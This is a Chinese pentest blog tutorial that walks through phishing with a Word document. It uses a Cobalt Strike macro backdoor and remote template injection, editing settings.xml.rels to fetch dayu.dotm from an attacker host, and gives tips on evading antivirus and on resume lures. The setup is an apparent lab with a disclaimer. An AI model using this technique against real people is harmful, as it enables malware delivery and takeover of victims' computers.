渗透测试-地基钓鱼篇-Word文档注入执行恶意宏(二十四)

最新推荐文章于 2024-08-20 18:48:02 发布
最新推荐文章于 2024-08-20 18:48:02 发布
阅读量3.4k 收藏 16
点赞数 3
分类专栏: 红队-地基-必会 文章标签: 信息安全 java 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/111307768
版权

**

渗透测试-地基钓鱼篇-Word文档注入执行恶意宏(二十四)

**

作者:大余
时间:2020-12-16

简介:

渗透测试-地基篇:
该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。

请注意:

对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

名言:

你对这行的兴趣,决定你在这行的成就!

文章目录

一、前言

网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段!

网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码、信用卡还是其他敏感信息,黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。

网络钓鱼攻击的兴起对所有组织都构成了重大威胁。重要的是,如果他们要保护自己的信息,所有组织都应该知道如何发现一些最常见的网络钓鱼骗局。同样还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。

这篇主要演示如何创建Word文档进行钓鱼,并控制对方,该方法也是红队常用的钓鱼方式之一,利用的是分离免杀!最后还会写一点思路!

二、环境介绍

在这里插入图片描述
黑客(攻击者):
IP:192.168.1.9
系统:kali.2020.4

VPS服务器:
目前演示是用kali来架设做VPS公网服务器的!道理意义一样!

办公电脑:
系统:windwos10
IP:192.168.1.208

目前kali上运行了Cobalt strike ,攻击者在自己的公网VPS服务器上制作了后门word文档,并上传上去作为钓鱼用,办公电脑收到对方邮件或者各种手段发送的word后门文档,最终黑客控制办公电脑的过程!!

三、Word文档注入后门宏演示

1、创建基础文档

在这里插入图片描述
在桌面基础创建文档名称:dayu.docx

2、开发工具

在这里插入图片描述
在这里插入图片描述

大部分办公都不需要开发环境工具,所以在word文档栏目中是没有开发工具这项栏目的,需要在这里打开即可!!

3、CS创建office后门

在这里插入图片描述
这里CS在前面已经讲得很详细了,不懂的往前看看文章!
Attacks-MS office Macro进入!
在这里插入图片描述
选择监听!点击Generate!
在这里插入图片描述
生成宏后门,点击复制!

4、插入后门代码

在这里插入图片描述
点击开发工具后,双击打开ThisDocument后出现编辑框!
将刚复制好的CS后门代码复制进入!
在这里插入图片描述
右上角选择Auto_Open,简单理解就是自动打开的意思!就是对方在打开word文档时,簿会自动运行宏提示信息,是否点击,点击就抓取到了shell!!

在这里插入图片描述
Ctrl+S保存后,会提示,点击否即可!
在这里插入图片描述
选择保存类型:*.dotm…(为什么选择dotm,往下看就晓得了~)
在这里插入图片描述
保存后提示报毒了!!未做任何免杀的!!继续…
在这里插入图片描述
目前桌面上有两个文件,一个宏,一个docx…(为了讲得更细致步骤就细化了)

5、简单测试

在这里插入图片描述
这里简单测试,是测试CS生成的shell和本机是互联的,确保能拿到对方控制权限!
右键点打开!(必须右键点打开!)
在这里插入图片描述
提示宏已禁用,点击启用内容!
在这里插入图片描述
正常上线!说明没问题,那么接下来继续!!

6、上传后门宏

在这里插入图片描述
将后门宏文件dayu.dotm上传到公网服务器中(这里用kali进行模拟)

7、新建word文档

在这里插入图片描述
目前文档类型非常多,我已简历为主!
这里创建一个简历模版保存到桌面即可!

8、修改文件名

在这里插入图片描述
修改文件名:docx改为zip类型!!

9、修改宏内容

在这里插入图片描述
将zip文件解压,进入/word/_rels目录下,打开settings.xml.rels宏文件!

file:///C:\Users\yujun\AppData\Roaming\Microsoft\Templates\精美简历,由%20MOO%20设计.dotx

这段就是宏需要执行的代码…
在这里插入图片描述
将该段代码修改为:

http://192.168.1.9:8001/dayu.dotm

意思就是执行开启宏后,会执行访问下载服务器上的dotm宏文件并执行!!
在这里插入图片描述
然后将内容重新压缩后,在修改zip为docx类型,修改后可看到就是我的简历了!
这里利用的是分离免杀的方法,里面的代码都是正常的,由于杀毒软件是静态查杀,所以无法查杀的!

10、下载并执行

在这里插入图片描述
可看到通过下载该简历文件,微软、360、火绒都是不查杀的!
在这里插入图片描述
出于好奇心,打开文档,提示:

该工程中的宏被禁止,请...........是否激活...

那么安全意识强的肯定是点X,安全意识差的,点确定,都没关系!
钓鱼嘛,主要钓鱼安全意识差,又不懂安全的人,社会太多太多了~~所以要加强安全意识啊!

这里点击确定或者关闭点X关掉该框框,都意义不大,主要的意思是提醒用户,左上角可以启用内用!!!使用宏!!!正常浏览简历!!!

那么左上角还有个安全警告,点击启用内容!!

11、成功控制

在这里插入图片描述
在这里插入图片描述
可看到成功获得办公电脑192.168.1.208的控制权限!!

五、另外思路

如果是遇到WPS的客户怎么办?通过上面的方法WPS打开我的简历是不会提示宏的!我这只提供思路,因为现在群体用WPS非常的多,就不会写出来了!

另外思路:
1、打开WPS创建宏是暗色的需要安装VBA for WPS才可以写WPS宏病毒代码执行!
2、Office和WPS中还可以隐藏文字,可以利用该方式通过配合录制宏的方法,用该方式执行…
3、Normal模块下,不止能编写一个settings.xml.rels…可以多宏…
4、弹框执行代码写入宏,那么Excel、PPT等也写…
5、不止docx宏,还有很多,能另存文件内容的都可以…

还要前面也提了混淆,就到这里,不在往下说了…提高安全意识吧~~

今天基础牢固就到这里,虽然基础,但是必须牢记于心。

要是你觉得这篇博客写的还不错,欢迎分享给身边的人,欢迎加入免费群共同学习成长。

在这里插入图片描述

如失效加个人以下图,个人微信拉入群。

在这里插入图片描述

大余xiyou
关注
专栏目录
Word一漏洞被用来实施“鱼叉式钓鱼”攻击
冷血书生的专栏
06-08 3017
据国外媒体报道,在安全公司爆出微软Word软件的一个安全漏洞被黑客利用来实施令人恐惧的“鱼叉式钓鱼”攻击后,微软公司日前表示将紧急推出一个补丁,微软还建议用户暂时在安全模式下使用Word。 微软的月度补丁发布日是6月13日。不过,在听闻这个令人震惊的消息后,微软已经决定紧急发布了一个补丁,专门修补发生在Word XP和Word 2003的漏洞。此外,为了防止黑客在补丁发布之前利用漏洞实施攻
红蓝对抗之邮件钓鱼攻击
Tencent_SRC的博客
09-04 4435
文|腾讯蓝军 jumbo红蓝对抗越加普遍及重要,甚至成为了大型赛事,随之⽽来的是防守方大量部署安全设备,如FW、WAF、IDS、IPS等,想要从Web端深⼊到对⽅内⽹已经困难重重。但是,...
恶意攻击者利用 Word 钓鱼文档瞄准 Github 开发者
weixin_34268579的博客
06-02 171
安全公司 Palo Alto Networks 报告,以前主要针对俄罗斯人的恶意攻击程序 Dimnie 今年瞄准了 Github 上的开发者。多名使用 Github 的开源开发者收到了钓鱼邮件,攻击者伪装成对他们的开源项目感兴趣,表示要进行合作,试图诱骗开发者点击附件。大致内容如下: 虽然这种类似的邮件开发者可能会受到很多,但每封钓鱼邮件都会携...
Word曝0day漏洞:无需启用,打开文档就自动安装恶意程序
weixin_34406086的博客
04-14 259
2019独角兽企业重金招聘Python工程师标准>>> ...
信息收集——Office钓鱼
Gjqhs的博客
03-11 459
了解office病毒、CobaltStrike创建和word创建方法 Office钓鱼介绍 office钓鱼 在无需交互、用户无感知的情况下,执行Office文档内嵌的一段恶意代码,从远控地址下载并运行恶意执行程序。例如:远控木马或者勒索病毒等。 CobaltStrike钓鱼 CobaltStrikeoffice钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件,当用户启动office自动运行。 CobaltStrike操作 点击CobaltStrike主界面att
office钓鱼学习
qq_38618396的博客
12-29 570
先建一个word,找到一张简历,将简历虚化,并另存为doc: 在office需要使用开发工具,需要自己开启: 文件-更多-选项-自定义功能区-从下列选择命令-主选项卡-开发工具,将开发工具前面的复选框给选上 选择 开发工具-图像控件 将这个控件设置为 浮于文字上方,并将控件拉满文档 点击这个控件,将属性设置为图片的名称 先使用cs生成 在auto_open()函数首部编写代码,设置图片的位置为0、高度为0,让运行后doc上图片消失,然后保存,office马就制作好了 点击之后,c
行业文档-设计装置-地基存在粉质沙层的钻孔桩成型方法.zip
08-26
在建筑工程领域,尤其是在地基处理和桩基础设计,如何有效地应对地基存在粉质沙层的问题至关重要。粉质沙层通常具有高渗透性、松散和易液化的特性,这给钻孔桩的施工带来了挑战。本知识点将详细探讨在地基存在...
行业文档-设计装置-弹性地基梁钢筋混凝土结构.zip
09-03
《弹性地基梁钢筋混凝土结构》是一份深入探讨建筑领域关键构造技术的行业文档,主要聚焦于在设计和装置过程如何处理钢筋混凝土结构在弹性地基上的应用。这份资料详细阐述了弹性地基梁的基本理论、设计原则、计算...
行业文档-设计装置-钢结构屋的地基基础“十”字方管与立柱的连接件.zip
08-27
文档将深入探讨这一主题,以下是基于这个主题的详细知识点: 1. **钢结构优点**:钢结构因其高强度、重量轻、施工速度快、可塑性和可回收性等特点,在现代建筑得到广泛应用,特别是在大跨度、高层建筑以及...
基于GPU的车辆-轨道-地基土耦合系统3D随机振动并行计算方法.pdf
09-25
基于GPU的车辆-轨道-地基土耦合系统3D随机振动并行计算方法 摘要:本文提出了一种基于GPU的车辆-轨道-地基土耦合系统3D随机振动并行计算方法,以解决轨道不平顺随机特征导致的车辆-轨道-地基土耦合系统随机分析计算...
行业文档-设计装置-“十”字形钢筋砼预制桩.zip
09-02
在建筑工程领域,预制桩是一种广泛使用的地基处理方式,尤其在软土地基上,能有效提供承载力并减小地面沉降。标题“行业文档-设计装置-‘十’字形钢筋砼预制桩.zip”表明这是一份关于“十”字形钢筋混凝土预制桩的...
Word文档注入实现钓鱼复现
nzyp_的博客
07-13 881
Word文档注入实现钓鱼复现 网上很多相关的文章,但都不是很细节,遇到了一些问题,在这里统一汇总一下。 前期准备 环境准备: 一台kali用于使用CS、一台靶机、一台vps服务器(这里使用kali) Word使用系统自带的Word2007 开始复现 首先启用Word的开发工具选项 创建一个doc或者docx文档,起一个混淆的名字。 打开kali,运行cs,创建Lisenter,点击Attacks-Packages-MS Office Macro选择监听者,然后复制 打开doc,点击开发工具里的
纯干货!word钓鱼文件制作教程
A10ng_的博客
10-20 1396
纯干货!word钓鱼文件制作教程 最近各类攻防演练,蓝队卷的太厉害,导致红队常常好几天打不了一个点,直呼肝不动。这时候常常钓鱼就成为了不二之选,往往能有奇效。下边就教大家怎么去制作一个木马,成功打进内网。 首先我们打开cs。 我们要创建一个监听,打开监听器这一栏,在底下有个Add按钮,点击就能添加监听了。 名字随意,端口不要跟常用的服务撞上就行。 点击攻击这一栏 然后依次点击生成后门——>Ms Office Macro。 点击之后选择好之前创建的...
Kali渗透测试:使用Word病毒进行渗透攻击
Liu_Bruce的博客
05-14 4482
Kali渗透测试:使用病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。病毒在Word引入之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,病毒利用这一点得到了大范围的传播。 构造一个包含病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 病毒会执行, 然后感染其他文件或
网络安全——cobalt Strike 之office钓鱼
weixin_54055099的博客
09-03 1709
Cobalt strike 之office 钓鱼
钓鱼的常见几种方式
最新发布
qq_55894976的博客
08-20 1127
【代码】钓鱼的常见几种方式。
钓鱼&文件名反转&office远程模板
qq_50854662的博客
05-29 1642
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关 0x01 件名反转 在渗透过程,有时需要通过钓鱼来来传播一些木马文件,而这些木马文件需要精心的伪装。RLO即 Start Of Right-to-Left override。我们可以通过选择插入Unicode控制字符RLO来达到反转文件名的效果 以CobaltStrike生成的木马BypassA.
CS制作office病毒钓鱼
qq_53297395的博客
05-19 2239
一、实验目的 1. 利用CobaltStrile生成word病毒的钓鱼payload,实现远程控制对方主机 二、实验器材 1.vmware 15.5 2.kali linux 3.cobaltstrike 4.windows 10两台 5.office 2019 三、实验内容 1.让kali作为cs的服务器端,一个win10作为cs的客户端,另一个win 10作为被攻击者,先看kali的ip:10.138.128.128 2.进入cobaltstrike文件夹,查看默认的cs密码.
使用Kali Linux Metasploit 复现 word
xujing19920814的博客
10-01 1586
使用Kali Linux Metasploit 复现
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值